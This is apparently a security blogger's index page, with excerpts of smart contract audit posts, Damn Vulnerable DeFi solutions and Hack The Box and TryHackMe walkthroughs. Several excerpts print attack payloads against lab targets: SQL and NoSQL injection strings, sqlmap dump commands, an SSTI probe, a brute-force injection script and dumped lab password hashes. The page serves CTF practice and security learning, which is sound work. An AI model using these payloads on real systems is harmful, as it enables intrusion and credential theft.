emacab98

Smart contract auditor, Penetration Tester, Security Engineer. The writeups on this page are supposedly short and to the point. If you need a nudge in the right direction or you want a second look on a hack you completed, these are quick reads for your fast-paced, (hopefully) ethical, hacker life. Merry Hacking!

The gas war

Introduction I thought I had a high. I participated in the Voting Booth bug bounty and reported a high-rated vulnerability. But it was rejected. Because I did not read a key piece of information that rendered all my thought process completely useless. Let's see what it was. Let us reopen the imaginary wound. The source code You can find the source code on my other blog post, the triumphant one about the bug that was, indeed, approved and validated. It is here, if you are interested. What fol...
Read post

The Bug of Confusion

The Contest Just before Christmas, the team at Codehawks created a bug bounty challenge to mimic one bug they encountered during one of their assessments. The challenge was to identify the same bug they reported during a real audit and report it as in a bug bounty program. The code base, shown right here, was simplified for the sake of clarity: // SPDX-License-Identifier: MIT pragma solidity ^0.8.23; import {Math} from "@openzeppelin/contracts/utils/math/Math.sol"; // @title VotingBooth // @a...
Read post

N out of M

The Audit In one of our most recent security reviews at Inference, we run into an interesting situation, which is discussed in this blog post. The premise is that of a smart contract with a simple access control mechanism: In order to change a storage variable, you have to be in possession of at least N out of M passwords This is a gigantic simplification of the original situation, however, it will help to discuss the interesting bug without getting lost in unnecessary details. The Smart C...
Read post

Tincho fuzz test

The Tincho Exercise While taking a look at Cyfrin Updraft, more on that in a later post, potentially, instructor Patrick Collins highly suggests to take onto a small challenge: a fuzz test exercise proposed by Tincho. You can find the repo of the challenge here. While Tincho already suggests his own solution right underneath the exercise, I thought to write this to go through my thought process developing the test, as it turned out to be structurally different, and equally effective, as Tincho...
Read post

Damn Vulnerable DeFi - Puppet v2

The contract The developers of the previous pool seem to have learned the lesson. And released a new version! Now they’re using a Uniswap v2 exchange as a price oracle, along with the recommended utility libraries. That should be enough. You start with 20 ETH and 10000 DVT tokens in balance. The pool has a million DVT tokens in balance. You know what to do. The only contract associated with the challenge is the following one: contract PuppetV2Pool { using SafeMath for uint256; addre...
Read post

Damn Vulnerable DeFi - Puppet

The contract There’s a lending pool where users can borrow Damn Valuable Tokens (DVTs). To do so, they first need to deposit twice the borrow amount in ETH as collateral. The pool currently has 100000 DVTs in liquidity. There’s a DVT market opened in an old Uniswap v1 exchange, currently with 10 ETH and 10 DVT in liquidity. Pass the challenge by taking all tokens from the lending pool. You start with 25 ETH and 1000 DVTs in balance. contract PuppetPool is ReentrancyGuard { using Address f...
Read post

Damn Vulnerable DeFi - Compromised

The contract Starting with just 0.1 ETH in balance, pass the challenge by obtaining all ETH available in the exchange. We also receive two very long strings as part of the challenge: 4d 48 68 6a 4e 6a 63 34 5a 57 59 78 59 57 45 30 4e 54 5a 6b 59 54 59 31 59 7a 5a 6d 59 7a 55 34 4e 6a 46 6b 4e 44 51 34 4f 54 4a 6a 5a 47 5a 68 59 7a 42 6a 4e 6d 4d 34 59 7a 49 31 4e 6a 42 69 5a 6a 42 6a 4f 57 5a 69 59 32 52 68 5a 54 4a 6d 4e 44 63 7a 4e 57 45 35 4d 48 67 79 4d 44 67 79 4e 44 4a 6a 4e 44 42 68...
Read post

Damn Vulnerable DeFi - Selfie

The contract A new cool lending pool has launched! It’s now offering flash loans of DVT tokens. It even includes a fancy governance mechanism to control it. What could go wrong, right ? You start with no DVT tokens in balance, and the pool has 1.5 million. Your goal is to take them all. The challenge has an interface which you shouldn't care too much about. The other contracts are more interesting, here are the key points about each of them. First, the contract offering the flash loan funct...
Read post

Damn Vulnerable DeFi - The Rewarder

The contract There’s a pool offering rewards in tokens every 5 days for those who deposit their DVT tokens into it. Alice, Bob, Charlie and David have already deposited some DVT tokens, and have won their rewards! You don’t have any DVT tokens. But in the upcoming round, you must claim most rewards for yourself. By the way, rumours say a new pool has just launched. Isn’t it offering flash loans of DVT tokens? This time there are multiple contracts. Two of them are just the contracts that rep...
Read post

Damn Vulnerable DeFi - Side Entrance

The contract The goal is to drain a pool that offers flash loans. The issue lies in the usage of an interface without any restriction on the msg.sender, that can implement that interface and perform any action. The solution The interesting part of the challenge contract is this function: function flashLoan(uint256 amount) external { uint256 balanceBefore = address(this).balance; IFlashLoanEtherReceiver(msg.sender).execute{value: amount}(); if (address(this).balance &...
Read post

Damn Vulnerable DeFi - Truster

The contract There is a pool containing 1 million DVT. The task is to drain it starting from nothing. The solution The contract is extremely short, here it is: // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import "@openzeppelin/contracts/utils/Address.sol"; import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; import "../DamnValuableToken.sol"; /** * @title TrusterLenderPool * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz) */ contract TrusterLenderPool ...
Read post

Damn Vulnerable DeFi - Naive Receiver

The contract The contract emulates a flash loan functionality. The challenge is to steal 10 ETH from the "receiver" user, while using the address whose alias is "player". The solution Each time a user requests a flash loan, they have to pay 1 ETH as a fee. In order to steal 10 ETH from a user, we can request 10 flash loans from their account. This is possible because the "flashLoan" functionality has no access control, so anyone can request flash loans for any other user by specifying their a...
Read post

Damn Vulnerable DeFi - Unstoppable

The contract The goal is to stop the flash loan functionality. The vault has a function called "flashLoan" that will revert in four different scenarios. Among these, the one that we can control that will make the function fail for all users is the third one, that checks whether "totalSupply" is different than "balanceBefore". if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance(); "totalSupply" represents the number of existing tokens: if we analyze ERC20.sol, we can see i...
Read post

Carpediem - HTB - Key Points

Target's IP: 10.10.11.167PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpHostname revealed: carpediem.htbThrough subdomain enumeration, we can find a new domain name as well: portal.carpediem.htbThere is a request subject to SQL injection:GET /?p=bikes&c=c4ca4238a0b923820dcc509a6f75849b'%2b(selectfrom(select(sleep(20)))a)%2b'Automating with SQLmap, we can dump the entire database, including the admin's hash:1,uploads/1635793020HONDAXADV.png,Male,<blank>,jhammond@carpediem.htb,Hamm...
Read post

Health - HTB - Key Points

Target's IP: 10.10.11.176Hostname: health.htbThe functionality of the website calls for SSRF, and it is, indeed, the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.Redirecting to the filtered port on 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQLinjection vulnerability we can exploit:python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/...
Read post

MetaTwo - HTB - Key Points

Target's IP: 10.10.11.186PORT   STATE SERVICE21/tcp open  ftp22/tcp open  ssh80/tcp open  httpUnknown host: metapress.htbProudly powered by WordPress. Let's enumerate using wpscan.[i] Plugin(s) Identified:                                                                                                                                                                                                                                                                                                 [+] bo...
Read post

BabyEncryption - HTB - Challenges

import string#from secret import MSG#ct = encryption(MSG)f = open('./msg.enc','r')text = bytes.fromhex(f.readline())result = ""alphabet = string.printablefor char in text:    for letter in alphabet:        if((123 * ord(letter) + 18 ) % 256 == char):            result += letterprint(result) ...
Read post

Toxic - HTB - Challenges

Challenge's address: 139.59.189.189:32670Checking out the source code attached to the challenge, it's easy to spot the call to unserialize. Following this blog post, https://snoopysecurity.github.io/web-application-security/2021/01/08/02_php_object_injection_exploitation-notes.html, we note that the only model defined in the challenge also calls the destruct magic method, which will help us in our exploitation.The method includes files, so it will allow us to read, we have a LFI on our hands. Fi...
Read post

Ambassador - HTB - Key Points

Target's IP: 10.10.11.183PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http3000/tcp open  ppp3306/tcp open  mysqlGrafana on 3000 subject to unauthorized arbitrary file read, as per https://www.exploit-db.com/exploits/50581 Reading passwd, consul and grafana and developer are users on the boxGoogling for common configuration files, we can read /etc/grafana/grafana.ini# Either "mysql", "postgres" or "sqlite3", it's your choice;type = sqlite3;host = 127.0.0.1:3306;name = grafana;user = roo...
Read post

Phonebook - HTB - Challenges

To exploit the wildcard SQL injection, this script helps us to identify the username:import requestsimport stringalphabet = string.digits + string.asciilowercase + string.asciiuppercase + string.punctuationword = ''while(True):    for letter in alphabet:        x = requests.post('http://165.22.122.58:31348/login', data = {'username': word + letter + '', 'password': ''})        if x.url == 'http://165.22.122.58:31348/':            word = word + letter            print(word)With a slight modificat...
Read post

Shared - HTB - Key Points

Target's IP: 10.10.11.172PORT    STATE SERVICE22/tcp  open  ssh80/tcp  open  http443/tcp open  httpsRoot page / redirects to: http://shared.htbSubdomain enumeration returns checkout as a valid subdomain, so we also add checkout.shared.htb to the hosts file.Ecommerce software by Prestashop seems subject to an exploit, more specifically https://www.exploit-db.com/exploits/45964, but I was not able to make it work.customcart cookie is injectable, the answer when requesting the page on the checkout ...
Read post

UpDown - HTB - Key Points

Target's IP: 10.10.11.177PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpConnecting to the website leaks a domain name, siteisup.htbRecursive brute forcing of directories reveals the following two ones:/dev/dev.gitDownloading the .git is easy thanks to directory indexing, just run wget -r http://siteisup.htb/dev/.gitAnalyzing the git repo, there is an interesting commit we must checkout:commit 8812785e31c879261050e72e20f298ae8c43b565Author: Abdou.Y <84577967+ab2pentest@users.noreply.gith...
Read post

Faculty - HTB - Key Points

Target's IP: 10.10.11.169PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httphttp-title: Did not follow redirect to http://faculty.htbJavascript on login page suggests that if you intercept response and change 3 to 1 you can bypass logincblake@faculty.htbejames@faculty.htbjsmith@faculty.htbsqlmap -u 'http://faculty.htb/view_schedule.php?id=1' -T users --dumpAdministrator | 1    | 1fecbe762af147c1176a0fc2c722a345 | adminGenerating PDFs as an authenticated user, you can see that the tool used to ...
Read post

Shoppy - HTB - Key Points

Target's IP: 10.10.11.180PORT     STATE SERVICE22/tcp   open  ssh80/tcp   open  http9093/tcp open  copycatThe login suffers from NoSQL injection, we can bypass the login stage withusername=admin'||'1==1//&password=aaasa Again, injecting the  user search and downloading the export:username "admin"password "23c6877d9e2b564ef8b32c3a23de27b2" username "josh"password "6ebcea65320589ca4f2f1ce039975995"These look like md5 hashes, trying hashcat to crack them:6ebcea65320589ca4f2f1ce039...
Read post

Photobomb - HTB - Key Points

Target's IP: 10.10.11.182PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpTrying to connect to the web server reveals an important information:Unknown host: photobomb.htbConnecting to the web server returns 401 - Unauthorized to all requests, but from the developer tools we see that the page includes a Javascript file that contains sensitive information:function init() {  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me  if (document.cookie.match(/...
Read post

Support - HTB - Key Points

Target IP: 10.10.11.174 nmap -sS -p- -T4 --min-rate=10000 10.10.11.174 Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST Nmap scan report for 10.10.11.174 Host is up (0.11s latency). Not shown: 65516 filtered tcp ports (no-response) PORT      STATE SERVICE 53/tcp    open  domain 88/tcp    open  kerberos-sec 135/tcp   open  msrpc 139/tcp   open  netbios-ssn 389/tcp   open  ldap 445/tcp   open  microsoft-ds 464/tcp   open  kpasswd5 593/tcp   open  http-rpc-epmap 636/tcp   open  ldap...
Read post

Trick - HTB - Key Points

Target's IP: 10.10.11.166nmap -sS -p- -T4 --min-rate=10000 10.10.11.166PORT   STATE SERVICE22/tcp open  ssh25/tcp open  smtp53/tcp open  domain80/tcp open  http└─# nslookup> server 10.10.11.166Default server: 10.10.11.166Address: 10.10.11.166#53> 10.10.11.166166.11.10.10.in-addr.arpa       name = trick.htb.We add this domain name to our /etc/hosts file. Now we can enumerate further for subdomains.Asking for a zone transfer withdig axfr trick.htb @trick.htb reveals a new subdomain, preprod-...
Read post

Vulnnet Endgame - THM - Key Points

Initial scan reveals 22 and 80. We also have a domain name from the introduction of the box, so we can enumerate for subdomainsRun gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txtI found 4 more valid domains, blog, api, shop and admin1Brute forcing for directories in the admin1 domain reveals some interesting ones, like vendor, fileadmin, typo3temp, typo3Typo3 seems to be an open source CMS, we lack credentials to login thoughAnalyzing th...
Read post

RingZer0CTF - Hash me if you can

We need to create a small script in order to be quick enough to solve this challenge, as we cannot possibly copy the message, hash it and send the correct request in under two seconds.The script to solve this challenge is fairly straightforward, here it is:import requestsimport hashlibx = requests.get('http://challenges.ringzer0team.com:10013/')if '----- BEGIN MESSAGE -----' in x.text:    start = x.text.index('----- BEGIN MESSAGE -----') + len('----- BEGIN MESSAGE -----') + 15 #15 is required to...
Read post

Nunchuks - HTB - Key Points

Open ports: 22, 80 and 443 after a super quick scanCertificate from 443 reveals a domain, nunchucks.htbSubdomain enumeration reveals another possible target, store.nunchucks.htbThe store has a newsletter subscription function that reflects the email address provided. Using Wappalyzer, we can see the website is running on NodeJS, so let's look for SSTI on NodeJSHacktricks suggests the following payload to try out: {{7*7}}. This should return 49. It is the payload listed under the template engine ...
Read post